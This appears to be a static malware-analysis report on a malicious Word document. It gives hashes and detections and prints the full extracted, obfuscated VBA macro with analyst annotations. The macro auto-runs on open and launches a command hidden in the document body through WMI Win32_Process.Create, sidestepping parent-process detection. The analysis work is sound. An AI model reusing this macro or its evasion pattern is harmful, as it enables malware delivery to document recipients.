Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7a6440a9f3f01a24…

MALICIOUS

Office (OLE)

138.5 KB · Created: 2021-01-25 09:18:00 · Authoring application: Microsoft Office Word · First seen: 2021-02-19
MD5: 49ceaa56c764bf82db474203b30b9ee1 SHA-1: 8e29c08a3653b61e363bccb402c7effe5db388bb SHA-256: 7a6440a9f3f01a2499d059c1ce8ab5587cbc30af01e8260f67c8888244eb1cb1
172 Risk Score

Heuristics 7

  • ClamAV: Doc.Malware.Valyria-10034158-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-10034158-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set N0jfgbdcexmfr = VBA.GetObject(Whsg9jxi_om)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8473 bytes
SHA-256: 2b8afd212b0a2ad26a917e5368163e3c32e5256aa102f773d94d8a58600b403d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
92 of 154 identifiers look randomly generated (e.g. 'Prp0rgc35w3gkhpk3u'); 1 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
' Module attributes as emitted by olevba for the first module. VB_PredeclaredId = True
' together with the VB_Base GUID {00020906-...} is the shape of a Word document (ThisDocument)
' module, which is consistent with it hosting the Document_open handler below and with the
' later reference to Ynzysnuyyfihfq23d.Content (the document body text).
Attribute VB_Name = "Ynzysnuyyfihfq23d"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Auto-execution entry point (OLE_VBA_DOCOPEN finding): runs as soon as the document is
' opened with macros enabled. Its only statement is a bare call to Oxx2xwfkfk7ikbf9w,
' defined in module Jlzk8qsqcshl6jk further down, so all behaviour lives there.
Private Sub Document_open()
Oxx2xwfkfk7ikbf9w
End Sub

' Second module: only its name was extracted; no code follows the attribute line.
Attribute VB_Name = "Pc1nzntniqj_dur51"
     

' Third module: holds the three functions below (entry routine, wrapper, de-padding helper).
Attribute VB_Name = "Jlzk8qsqcshl6jk"
' Entry routine called from Document_open. Most of the body is padding: every
' `GoTo <label>` jumps over an indented stanza of Const/Dim/If statements that is
' never executed. The stanzas are textual copies of one another with renamed
' identifiers (the name-mangling noted under EXTRACTED_FILE_STATIC_TRIAGE); only
' the column-0 statements between the labels run. In execution order they:
'   1. copy the document body (Ynzysnuyyfihfq23d.Content) into skuwd;
'   2. assemble Cr4f505hg7vldsf0c from string fragments padded with the filler
'      token "ns wu db nd", which Bsmpx01xdp1btsbzx (via Prp0rgc35w3gkhpk3u) strips;
'   3. call VBA.GetObject on the de-padded string (OLE_VBA_GETOBJ finding) and
'      invoke .Create on the returned object, passing the de-padded document text
'      minus its first three characters.
' Removing the filler from the literals leaves
'   "winmgmt" + Mid(Application.Name, 6, 1) + ":win32_" + "p" + "rocess";
' in Word, Application.Name is "Microsoft Word" (6th character "s"), so the
' GetObject argument would be the WMI moniker winmgmts:win32_process. This is
' inferred from the literals; the report does not show the decoded string, and
' Kef0mya01bb (the Replace replacement) is not defined in the extracted source.
' The command actually passed to .Create comes from the document text, not from
' the macro, and is therefore not visible in this listing.
' Detection note: a process started through a WMI Win32_Process.Create call is
' spawned by the WMI service rather than as a direct child of the Word process,
' so parent/child rules keyed only on winword.exe would not observe it.
Function Oxx2xwfkfk7ikbf9w()
   GoTo aRiqA
    ' --- dead stanza: skipped by the GoTo above. Every later stanza in this
    ' function (and in the two functions below) has the same shape. `Target` is
    ' never declared and Array(...) is Set into a Range, so this would likely
    ' fail at run time if it were ever reached. ---
    Const BjxaCGJ As String = "A"
    Const xolsDFAoA As String = ","
    Const Ikdha As String = "*high*,*critic*"
    Dim ihJfBp As Range: Set ihJfBp = Array((BjxaCGJ), Target)
    If ihJfBp Is Nothing Then
    End If
    Dim URsHL() As String: URsHL = Split(Ikdha, xolsDFAoA)
aRiqA:
' skuwd = Z3neypc4_6hl3z + <document module>.Content + Q955il2wdzr2d8fc1a (line
' continuation split across three lines). Z3neypc4_6hl3z and Q955il2wdzr2d8fc1a
' are not defined in the extracted source; as undeclared variables they would be
' Empty, leaving only the document body text (inferred, not confirmed).
skuwd = Z3neypc4_6hl3z + Ynzysnuyyfihfq23d _
. _
Content + Q955il2wdzr2d8fc1a
   GoTo qckhE
    Const szAVCX As String = "A"
    Const ZDFvjGA As String = ","
    Const wefyBED As String = "*high*,*critic*"
    Dim YqzDYkkZ As Range: Set YqzDYkkZ = Array((szAVCX), Target)
    If YqzDYkkZ Is Nothing Then
    End If
    Dim LPhmsCuzH() As String: LPhmsCuzH = Split(wefyBED, ZDFvjGA)
qckhE:
' Fragments "p" and "rocess" once the "ns wu db nd" filler is removed.
mjbBYHhbs = "ns wu db " + "ndpns wu db nd"
T0lomy3trzjqt6zc = "ns wu db ndrons wu db ndns wu db ndc" + "ens wu db ndsns wu db ndsns wu db ndns wu db ndns wu db nd"
   GoTo BcOIJEb
    Const IzaGEVCD As String = "A"
    Const frXBRIAUC As String = ","
    Const liXWDHf As String = "*high*,*critic*"
    Dim BBKJHBtF As Range: Set BBKJHBtF = Array((IzaGEVCD), Target)
    If BBKJHBtF Is Nothing Then
    End If
    Dim vXKNhR() As String: vXKNhR = Split(liXWDHf, frXBRIAUC)
BcOIJEb:
' Fragment ":win32_" once de-padded.
T0_pq5at6a81jt230i = "ns wu db nd:wns wu db ndns w" + "u db ndinns wu db nd3ns wu db nd2ns wu db nd_ns wu db nd"
   GoTo NjfVZEH
    Const cujVJONG As String = "A"
    Const zrdcAzBue As String = ","
    Const FwnlEcJ As String = "*high*,*critic*"
    Dim MemVBBC As Range: Set MemVBBC = Array((cujVJONG), Target)
    If MemVBBC Is Nothing Then
    End If
    Dim XCCUFUDF() As String: XCCUFUDF = Split(FwnlEcJ, zrdcAzBue)
NjfVZEH:
' Fragment "winmgmt" once de-padded.
T2kyo942hf2v = "wns wu db ndi" + "nns wu db ndmns wu db ndgmns wu db ndtns wu db ndns wu db nd"
   GoTo dDVvDFyJ
    Const KTwdM As String = "A"
    Const kOGmA As String = ","
    Const bvWlGF As String = "*high*,*critic*"
    Dim CivKlI As Range: Set CivKlI = Array((KTwdM), Target)
    If CivKlI Is Nothing Then
    End If
    Dim BJuiHE() As String: BJuiHE = Split(bvWlGF, kOGmA)
dDVvDFyJ:
' Filler + the 6th character of Application.Name (60 / 10 = 6) + filler. Taking the
' character from the host application's name both completes the string and ties the
' decoded value to running inside Word.
X8gbzx64bs3 = "ns wu db ndns wu db nd" + Mid(Application.Name, 60 / 10, 1) + "ns wu db ndns wu db nd"
   GoTo OMnbClgE
    Const NABiUJmBA As String = "A"
    Const TTSSDBE As String = ","
    Const zWNhsCZ As String = "*high*,*critic*"
    Dim hpBCIH As Range: Set hpBCIH = Array((NABiUJmBA), Target)
    If hpBCIH Is Nothing Then
    End If
    Dim tkDRHFKIL() As String: tkDRHFKIL = Split(zWNhsCZ, TTSSDBE)
OMnbClgE:
' Concatenation order: "winmgmt" | <char> | ":win32_" | "p" | "rocess" (still padded).
Cr4f505hg7vldsf0c = T2kyo942hf2v + X8gbzx64bs3 + T0_pq5at6a81jt230i + mjbBYHhbs + T0lomy3trzjqt6zc
   GoTo LIJNuGn
    Const yoxbGFcFG As String = "A"
    Const EBzng As String = ","
    Const WnGZXISGD As String = "*high*,*critic*"
    Dim TtymyqHC As Range: Set TtymyqHC = Array((yoxbGFcFG), Target)
    If TtymyqHC Is Nothing Then
    End If
    Dim kzJQDGJE() As String: kzJQDGJE = Split(WnGZXISGD, EBzng)
LIJNuGn:
' Strip the filler token (Prp0rgc35w3gkhpk3u -> Bsmpx01xdp1btsbzx -> Replace).
Whsg9jxi_om = Prp0rgc35w3gkhpk3u(Cr4f505hg7vldsf0c)
   GoTo IfwvovBbI
    Const nUCpSBGl As String = "A"
    Const dGHeiB As String = ","
    Const DfLwCIJs As String = "*high*,*critic*"
    Dim wPwsfD As Range: Set wPwsfD = Array((nUCpSBGl), Target)
    If wPwsfD Is Nothing Then
    End If
    Dim GwCvEyD() As String: GwCvEyD = Split(DfLwCIJs, dGHeiB)
IfwvovBbI:
' Late-bound object obtained from the de-padded moniker string (OLE_VBA_GETOBJ finding).
Set N0jfgbdcexmfr = VBA.GetObject(Whsg9jxi_om)
   GoTo mgbUQB
    Const ODzQPrd As String = "A"
    Const gHvzZ As String = ","
    Const gzqiCG As String = "*high*,*critic*"
    Dim kqPZDRGh As Range: Set kqPZDRGh = Array((ODzQPrd), Target)
    If kqPZDRGh Is Nothing Then
    End If
    Dim eFJdCEIGJ() As String: eFJdCEIGJ = Split(gzqiCG, gHvzZ)
mgbUQB:
' Drop the first three characters of the document text (Mid from position 1+1+1+1 = 4),
' then run it through the same filler-stripping helper.
mxkikw = Mid(skuwd, (1 + 1 + 1 + 1), Len(skuwd))
pqwm = Prp0rgc35w3gkhpk3u(mxkikw)
   GoTo SdmZKHA
    Const JoWtI As String = "A"
    Const RzBkG As String = ","
    Const RoGdiLo As String = "*high*,*critic*"
    Dim WTESfHHbE As Range: Set WTESfHHbE = Array((JoWtI), Target)
    If WTESfHHbE Is Nothing Then
    End If
    Dim AsczD() As String: AsczD = Split(RoGdiLo, RzBkG)
SdmZKHA:
' .Create on the GetObject result with the document-derived string as first argument.
' Nbpclsvfxustc and I85a5jzr195h are not defined in the extracted source (Empty if undeclared).
N0jfgbdcexmfr.Create pqwm, Nbpclsvfxustc, I85a5jzr195h
   GoTo woXMHFAWj
    Const tTYAKI As String = "A"
    Const NPikOxWEE As String = ","
    Const wGGXPWXvH As String = "*high*,*critic*"
    Dim eBdxEG As Range: Set eBdxEG = Array((tTYAKI), Target)
    If eBdxEG Is Nothing Then
    End If
    Dim GpgYnI() As String: GpgYnI = Split(wGGXPWXvH, NPikOxWEE)
woXMHFAWj:
End Function
' Thin wrapper around Bsmpx01xdp1btsbzx whose only addition is On Error Resume Next,
' so any failure during the filler-stripping call is silently swallowed and the
' function returns whatever Zo3kx9wgfsdgp2v holds at that point. The argument is
' copied through S4z44a_rm07 and the result through Zo3kx9wgfsdgp2v purely as
' padding; the four GoTo-skipped stanzas are dead code of the same shape as in
' Oxx2xwfkfk7ikbf9w.
Function Prp0rgc35w3gkhpk3u(Zdvjtoaydjbgx6nno)
On Error Resume Next
   GoTo mQJJC
    Const RCizEteb As String = "A"
    Const fcMsqBqHS As String = ","
    Const eiWFHgJI As String = "*high*,*critic*"
    Dim HiXlCAMl As Range: Set HiXlCAMl = Array((RCizEteb), Target)
    If HiXlCAMl Is Nothing Then
    End If
    Dim HKGPhf() As String: HKGPhf = Split(eiWFHgJI, fcMsqBqHS)
mQJJC:
S4z44a_rm07 = Zdvjtoaydjbgx6nno
   GoTo qabazEA
    Const TWtrFHKBF As String = "A"
    Const UFSXB As String = ","
    Const SwIwjFCGt As String = "*high*,*critic*"
    Dim tfUFkPBI As Range: Set tfUFkPBI = Array((TWtrFHKBF), Target)
    If tfUFkPBI Is Nothing Then
    End If
    Dim GwBkDZG() As String: GwBkDZG = Split(SwIwjFCGt, UFSXB)
qabazEA:
' The actual work: remove the "ns wu db nd" filler token from the input.
Zo3kx9wgfsdgp2v = Bsmpx01xdp1btsbzx(S4z44a_rm07)
   GoTo IAZNKNFF
    Const QhLjEC As String = "A"
    Const TmaaI As String = ","
    Const QTrqHnpVB As String = "*high*,*critic*"
    Dim MFOcG As Range: Set MFOcG = Array((QhLjEC), Target)
    If MFOcG Is Nothing Then
    End If
    Dim tllnMEB() As String: tllnMEB = Split(QTrqHnpVB, TmaaI)
IAZNKNFF:
Prp0rgc35w3gkhpk3u = Zo3kx9wgfsdgp2v
   GoTo dxujxGCSH
    Const GvzsBP As String = "A"
    Const VkIrTt As String = ","
    Const OhlNFI As String = "*high*,*critic*"
    Dim wxhyXoc As Range: Set wxhyXoc = Array((GvzsBP), Target)
    If wxhyXoc Is Nothing Then
    End If
    Dim JHxtqF() As String: JHxtqF = Split(OhlNFI, VkIrTt)
dxujxGCSH:
End Function
' The only real de-obfuscation primitive in the macro: a single Replace that
' substitutes Kef0mya01bb for every occurrence of the filler token "ns wu db nd"
' (split across two literals in the Replace call). Kef0mya01bb is not defined in
' the extracted source; if it is an undeclared variable it is Empty and the call
' simply deletes the token, which is what turns the padded fragments in
' Oxx2xwfkfk7ikbf9w into their short cleartext pieces (inferred, not confirmed).
' The three GoTo-skipped stanzas before the Replace and the three after it are
' dead code of the same shape as elsewhere in this module.
Function Bsmpx01xdp1btsbzx(Oe3lz2kgadv0)
   GoTo tFQrUF
    Const FQbNABABD As String = "A"
    Const bhdApJCs As String = ","
    Const wrBNJ As String = "*high*,*critic*"
    Dim VCOQBBJME As Range: Set VCOQBBJME = Array((FQbNABABD), Target)
    If VCOQBBJME Is Nothing Then
    End If
    Dim AndgBCK() As String: AndgBCK = Split(wrBNJ, bhdApJCs)
tFQrUF:
   GoTo YeFGHHg
    Const YoONRCDR As String = "A"
    Const NRCfdB As String = ","
    Const BkXdJC As String = "*high*,*critic*"
    Dim xhvKHu As Range: Set xhvKHu = Array((YoONRCDR), Target)
    If xhvKHu Is Nothing Then
    End If
    Dim zaPgDlYE() As String: zaPgDlYE = Split(BkXdJC, NRCfdB)
YeFGHHg:
   GoTo VGJvOIo
    Const IcMvJH As String = "A"
    Const nMrFDxBZ As String = ","
    Const DOTbEvAC As String = "*high*,*critic*"
    Dim DWDXCYzB As Range: Set DWDXCYzB = Array((IcMvJH), Target)
    If DWDXCYzB Is Nothing Then
    End If
    Dim gFPNA() As String: gFPNA = Split(DOTbEvAC, nMrFDxBZ)
VGJvOIo:
' The only executed statement: strip the filler token from the argument.
Bsmpx01xdp1btsbzx = Replace(Oe3lz2kgadv0, "ns w" + "u db nd", Kef0mya01bb)
   GoTo HJbpE
    Const jvKCCCN As String = "A"
    Const mpLEDLwAI As String = ","
    Const ymBRCJA As String = "*high*,*critic*"
    Dim lJxIKkhCA As Range: Set lJxIKkhCA = Array((jvKCCCN), Target)
    If lJxIKkhCA Is Nothing Then
    End If
    Dim UNxmoIDW() As String: UNxmoIDW = Split(ymBRCJA, mpLEDLwAI)
HJbpE:
   GoTo AEmiPt
    Const nXOBD As String = "A"
    Const PCZMFnb As String = ","
    Const aspdJ As String = "*high*,*critic*"
    Dim kYSmGCjDH As Range: Set kYSmGCjDH = Array((nXOBD), Target)
    If kYSmGCjDH Is Nothing Then
    End If
    Dim xqRcJHJC() As String: xqRcJHJC = Split(aspdJ, PCZMFnb)
AEmiPt:
   GoTo uPBZMu
    Const RPnSaCJu As String = "A"
    Const UdmGIddWE As String = ","
    Const kvSXRJ As String = "*high*,*critic*"
    Dim UByHC As Range: Set UByHC = Array((RPnSaCJu), Target)
    If UByHC Is Nothing Then
    End If
    Dim LIhSwfESI() As String: LIhSwfESI = Split(kvSXRJ, UdmGIddWE)
uPBZMu:
End Function